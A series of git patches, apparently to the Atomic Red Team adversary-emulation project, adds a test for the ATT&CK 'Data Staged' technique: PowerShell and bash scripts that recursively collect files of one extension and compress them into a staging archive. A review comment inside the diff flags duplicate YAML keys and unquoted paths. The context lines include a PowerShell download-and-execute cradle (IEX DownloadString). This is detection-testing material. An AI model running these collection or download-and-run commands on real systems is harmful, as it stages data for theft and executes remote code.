From 1845c6fe17c7d1eab480385e7585d67466652da4 Mon Sep 17 00:00:00 2001 From: nicholasaleks Date: Thu, 12 Jul 2018 00:21:01 -0400 Subject: [PATCH 1/4] T1074/collect-n-compress-file-types: Outlined a new collection > data staged attack type (collect n compress file types) within the T1074.md readme. Also raised a few questions on best practices --- atomics/T1074/T1074.md | 75 ++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 75 insertions(+) diff --git a/atomics/T1074/T1074.md b/atomics/T1074/T1074.md index f6f8183511..325d66eb64 100644 --- a/atomics/T1074/T1074.md +++ b/atomics/T1074/T1074.md @@ -15,6 +15,7 @@ Data Sources: File monitoring, Process monitoring, Process command-line paramete ## Atomic Tests - [Atomic Test #1 - Stage data from Discovery.bat](#atomic-test-1---stage-data-from-discoverybat) +- [Atomic Test #2 - Collect all files extensions and stage within a compressed directory](#atomic-test-1---compress-all-file-types)
@@ -30,3 +31,77 @@ Utilize powershell to download discovery.bat and save to a local file powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat')" > c:\windows\pi.log ```
+
+
+ +## Atomic Test #2 - Collect and Compress all file types +Collect all specified file extensions recursively from a specified file path on the target machine. All located files are copied into a temporary location before being compressed. + +**Supported Platforms:** +- Windows +- Linux + + +#### Run it with `powershell`! +Note: +- ```{{ path }}```: requires a default path to start recursive search from +- ```{{ extension }}```: requires a file extension to search for + +``` +$FolderPath = '{{ path }}' +$FileExtension = '{{ extension }}' + +New-Item -ItemType directory -Path C:\temp\staging + +function TestPath() +{ + $FileExists = Test-Path $FolderPath + If ($FileExists -eq $True) + { + Return $true + } + Else + { + Return $false + } +} + +function ZipFiles() +{ + Add-Type -Assembly System.IO.Compression.FileSystem + $compressionLevel = [System.IO.Compression.CompressionLevel]::Optimal + [System.IO.Compression.ZipFile]::CreateFromDirectory("C:\temp\staging", + "C:\temp\staging.zip", $compressionLevel, $false) +} + +$Result = (TestPath($FolderPath)); + +If ($Result) +{ + $Dir = get-childitem $FolderPath -Recurse -ErrorAction Ignore + $List = $Dir | where {$_.extension -eq $FileExtension} + $List | Copy-Item -Destination C:\temp\staging\ -ErrorAction Ignore +} +else +{ + "Folder path is incorrect." +} + +ZipFiles + +Remove-Item -Recurse -Force C:\temp\staging + +``` + +#### Run it with `bash`! +Note: +- ```{{ path }}```: requires a default path to start recursive search from +- ```{{ extension }}```: requires a file extension to search for + +``` +mkdir -p /tmp/staging +find {{ path }} -name '*{{ extension }}' -exec cp -prv '{}' '/tmp/staging' ';' +tar -zcvf /tmp/staging.tar.gz /tmp/staging/ +rm -rf /tmp/staging +``` +
From fab7677f2de9eb3fee46d98cdb408f8b8f91a0e0 Mon Sep 17 00:00:00 2001 From: nicholasaleks Date: Thu, 12 Jul 2018 00:21:47 -0400 Subject: [PATCH 2/4] T1074/collect-n-compress-file-types: Yamlized the attack (again raising questions in comments about best practices) --- atomics/T1074/T1074.yaml | 97 ++++++++++++++++++++++++++++++++++++++++ 1 file changed, 97 insertions(+) diff --git a/atomics/T1074/T1074.yaml b/atomics/T1074/T1074.yaml index 14c3dd2ad3..a83ae60ea3 100644 --- a/atomics/T1074/T1074.yaml +++ b/atomics/T1074/T1074.yaml 
@@ -7,8 +7,105 @@ atomic_tests: description: | Utilize powershell to download discovery.bat and save to a local file + supported_platforms:--- +attack_technique: T1074 +display_name: Data Staged + +atomic_tests: +- name: Stage data from Discovery.bat + description: | + Utilize powershell to download discovery.bat and save to a local file + + supported_platforms: + - windows + + executor: + name: powershell + command: | + powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat')" > c:\windows\pi.log + +- name: Collect and Compress all file types + description: | + Collect all specified file extensions recursively from a specified file path on the target machine. All located files are copied into a temporary location before being compressed. + + # Not sure if atomic-red supports multi-platform executors under a single attack name + # It would be nice to correlate (- windows: powershell executor && - linux: sh executor) supported_platforms: - windows + - linux + + input_arguments: + extension: + description: Extensions to search for + type: String + default: .log + + input_arguments: + path: + description: Path to recursively search from + type: Path + default: / + + # Windows Payload + # Not sure if multi-line commands support powershell functions or if this would be better placed + # within an 'atomics/T1074/payload/windows-payload.ps1' file and utilize a (New-Object Net.WebClient).DownloadString + # to pull down the payload. 
(Not sure how to pass input arguments though) + executor: + name: powershell + command: | + $FolderPath = '{{ path }}' + $FileExtension = '{{ extension }}' + + New-Item -ItemType directory -Path C:\temp\staging + + function TestPath() + { + $FileExists = Test-Path $FolderPath + If ($FileExists -eq $True) + { + Return $true + } + Else + { + Return $false + } + } + + function ZipFiles() + { + Add-Type -Assembly System.IO.Compression.FileSystem + $compressionLevel = [System.IO.Compression.CompressionLevel]::Optimal + [System.IO.Compression.ZipFile]::CreateFromDirectory("C:\temp\staging", + "C:\temp\staging.zip", $compressionLevel, $false) + } + + $Result = (TestPath($FolderPath)); + + If ($Result) + { + $Dir = get-childitem $FolderPath -Recurse -ErrorAction Ignore + $List = $Dir | where {$_.extension -eq $FileExtension} + $List | Copy-Item -Destination C:\temp\staging\ -ErrorAction Ignore + } + else + { + "Folder path is incorrect." + } + + ZipFiles + + Remove-Item -Recurse -Force C:\temp\staging + + # Linux Payload + executor: + name: sh + command: | + mkdir -p /tmp/staging + find {{ path }} -name '*{{ extension }}' -exec cp -prv '{}' '/tmp/staging' ';' + tar -zcvf /tmp/staging.tar.gz /tmp/staging/ + rm -rf /tmp/staging + + - windows executor: name: powershell From ceb9e59afe37c3b41cd0798e8098ea755c94c396 Mon Sep 17 00:00:00 2001 From: nicholasaleks Date: Thu, 12 Jul 2018 00:25:34 -0400 Subject: [PATCH 3/4] T1074/collect-n-compress-file-types: Fixed yaml errors in T1074 --- atomics/T1074/T1074.yaml | 16 ---------------- 1 file changed, 16 deletions(-) diff --git a/atomics/T1074/T1074.yaml b/atomics/T1074/T1074.yaml index a83ae60ea3..6cf634dee5 100644 --- a/atomics/T1074/T1074.yaml +++ b/atomics/T1074/T1074.yaml 
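Review bot: The new test entry in this hunk declares `input_arguments:` twice and `executor:` twice under one mapping, which is a duplicate-key error in strict YAML loaders and last-key-wins in lenient ones, so the `extension` argument and the PowerShell executor are silently lost; the third patch in this series removes the duplicated document header but leaves these duplicate keys in place. Both arguments belong under a single `input_arguments:` block, and the Windows and Linux payloads need their own test entries (one executor each, or whatever per-platform form the project's runner supports) rather than two `executor:` keys, as sketched below. Separately, the `sh` command substitutes the path unquoted in `find {{ path }} -name '*{{ extension }}'`, so a path containing spaces or glob characters is word-split; `find "{{ path }}" -name "*{{ extension }}" -exec cp -prv '{}' /tmp/staging ';'` avoids that, and the same line appears in the T1074.md hunk of the first patch. Note also that `cp` into a flat staging directory overwrites same-named files from different source directories, so the archive under-collects; presumably acceptable for a test, but worth stating in the description.
```yaml
- name: Collect and Compress all file types
  description: |
    Collect all specified file extensions recursively from a specified file path on the target machine. All located files are copied into a temporary location before being compressed.

  supported_platforms:
    - windows

  input_arguments:
    extension:
      description: Extensions to search for
      type: String
      default: .log
    path:
      description: Path to recursively search from
      type: Path
      default: /

  executor:
    # … unchanged: powershell executor and its command block …

- name: Collect and Compress all file types (Linux)
  description: |
    Collect all specified file extensions recursively from a specified file path on the target machine. All located files are copied into a temporary location before being compressed.

  supported_platforms:
    - linux

  input_arguments:
    extension:
      description: Extensions to search for
      type: String
      default: .log
    path:
      description: Path to recursively search from
      type: Path
      default: /

  executor:
    name: sh
    command: |
      mkdir -p /tmp/staging
      find "{{ path }}" -name "*{{ extension }}" -exec cp -prv '{}' /tmp/staging ';'
      tar -zcvf /tmp/staging.tar.gz /tmp/staging/
      rm -rf /tmp/staging
```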
@@ -2,15 +2,6 @@ attack_technique: T1074 display_name: Data Staged -atomic_tests: -- name: Stage data from Discovery.bat - description: | - Utilize powershell to download discovery.bat and save to a local file - - supported_platforms:--- -attack_technique: T1074 -display_name: Data Staged - atomic_tests: - name: Stage data from Discovery.bat description: | @@ -104,10 +95,3 @@ atomic_tests: find {{ path }} -name '*{{ extension }}' -exec cp -prv '{}' '/tmp/staging' ';' tar -zcvf /tmp/staging.tar.gz /tmp/staging/ rm -rf /tmp/staging - - - windows - - executor: - name: powershell - command: | - powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat')" > c:\windows\pi.log From 86342935669476599fccfb9538d4d50347cd9da6 Mon Sep 17 00:00:00 2001 From: nicholasaleks Date: Thu, 12 Jul 2018 00:33:42 -0400 Subject: [PATCH 4/4] T1074/collect-n-compress-file-types: Updated typos in atomic test #2 --- atomics/T1074/T1074.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1074/T1074.md b/atomics/T1074/T1074.md index 325d66eb64..e03012079b 100644 --- a/atomics/T1074/T1074.md +++ b/atomics/T1074/T1074.md @@ -15,7 +15,7 @@ Data Sources: File monitoring, Process monitoring, Process command-line paramete ## Atomic Tests - [Atomic Test #1 - Stage data from Discovery.bat](#atomic-test-1---stage-data-from-discoverybat) -- [Atomic Test #2 - Collect all files extensions and stage within a compressed directory](#atomic-test-1---compress-all-file-types) +- [Atomic Test #2 - Collect and Compress all file types](#atomic-test-2---collect-and-compress-all-file-types)